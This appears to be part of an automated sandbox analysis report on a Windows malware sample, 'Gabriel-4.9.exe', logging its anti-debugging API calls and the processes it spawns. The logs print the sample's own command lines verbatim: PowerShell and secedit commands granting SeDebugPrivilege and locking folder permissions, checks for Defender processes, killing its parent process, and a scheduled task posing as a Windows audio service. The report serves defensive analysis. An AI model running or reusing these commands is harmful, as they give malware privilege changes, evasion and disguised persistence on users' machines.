Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Code function: 0_2_00007FF746502680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00007FF746502680
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Code function: 0_2_00007FF746503240 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_00007FF746503240
Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Code function: 0_2_00007FF7465042FC SetUnhandledExceptionFilter,	0_2_00007FF7465042FC
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018001E0D0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018001E0D0
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018002BB84 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_000000018002BB84
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Code function: 2_2_000000018003A484 RtlCaptureContext,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_000000018003A484
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0034A8ED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	30_2_0034A8ED
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_00346340 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	30_2_00346340
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0629D0B0 SetUnhandledExceptionFilter,	30_2_0629D0B0
Source: C:\ProgramData\Program\iusb3mon.exe	Code function: 30_2_0629D0C2 SetUnhandledExceptionFilter,	30_2_0629D0C2

HIPS / PFW / Operating System Protection Evasion

Encrypted powershell cmdline option found

Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"	Jump to behavior
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"
Source: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"
Source: C:\ProgramData\Program\iusb3mon.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Data\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege3.')) -Force;"

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: CreateToolhelp32Snapshot,Process32First,OpenProcess,TerminateProcess,Process32Next,CloseHandle, explorer.exe

30_2_06293C8E

Source: C:\ProgramData\Program\iusb3mon.exe

Code function: 30_2_06294652 GetModuleFileNameA,ShellExecuteExA,ExitProcess,

30_2_06294652

Source: C:\Users\user\Desktop\Gabriel-4.9.exe	Process created: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe "C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe" __IRAOFF:5572466 "__IRAFN:C:\Users\user\Desktop\Gabriel-4.9.exe" "__IRCT:0" "__IRTSS:0" "__IRSID:S-1-5-21-2246122658-3693405117-2476756634-1003"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"msmpeng.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"securityhealthsystray.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"mpcopyaccelerator.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MpDefenderCoreService.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $mypid=(Get-WmiObject -Query 'select ParentProcessId from Win32_Process where ProcessId=3220').ParentProcessId;if($mypid){Stop-Process -Id $mypid -Force;}	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c start "title" "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -C "Set-Content -Value @('[Unicode]','Unicode=yes','[Version]','signature=\"$CHICAGO$\"','Revision=1','[Privilege Rights]','SeDebugPrivilege = S-1-5-18','[File Security]','\"C:\ProgramData\Program\",0,\"D:AR(D;OICI;DTSDRCWD;;;WD)\"') -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) -Encoding Unicode; secedit.exe /configure /db ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.sdb')) /cfg ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.inf')) /overwrite /log ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.log')) /quiet; Remove-Item -Path ([IO.Path]::Combine($env:TEMP, 'SeDebugPrivilege1.')) -Force;"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Windows Audio Endpoint Builder( )" /xml "C:\ProgramData\Microsoft\MicrosoftNetFramework.xml	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\_ir_sf_temp_0\irsetup.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Process ([IO.Path]::GetFileNameWithoutExtension(\"MTGHu7b.exe\"));	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe "C:\Users\Public\Documents\UfHE8OB\MTGHu7b.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege1.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege3.log /quiet
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\SecEdit.exe "C:\Windows\system32\SecEdit.exe" /configure /db C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.sdb /cfg C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.inf /overwrite /log C:\Users\user\AppData\Local\Temp\SeDebugPrivilege4.log /quiet
